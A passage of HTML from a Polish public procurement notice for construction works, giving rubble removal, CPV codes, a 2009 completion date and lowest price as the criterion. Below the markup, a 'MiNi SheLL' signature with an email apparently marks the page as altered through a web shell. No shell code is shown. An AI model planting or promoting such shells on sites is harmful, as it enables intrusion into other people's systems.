- wywiezienie gruzu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.21.00-8, 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 38.43.12.00-7, 45.31.56.00-4, 42.52.10.00-4, 45.40.00.00-1, 45.42.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com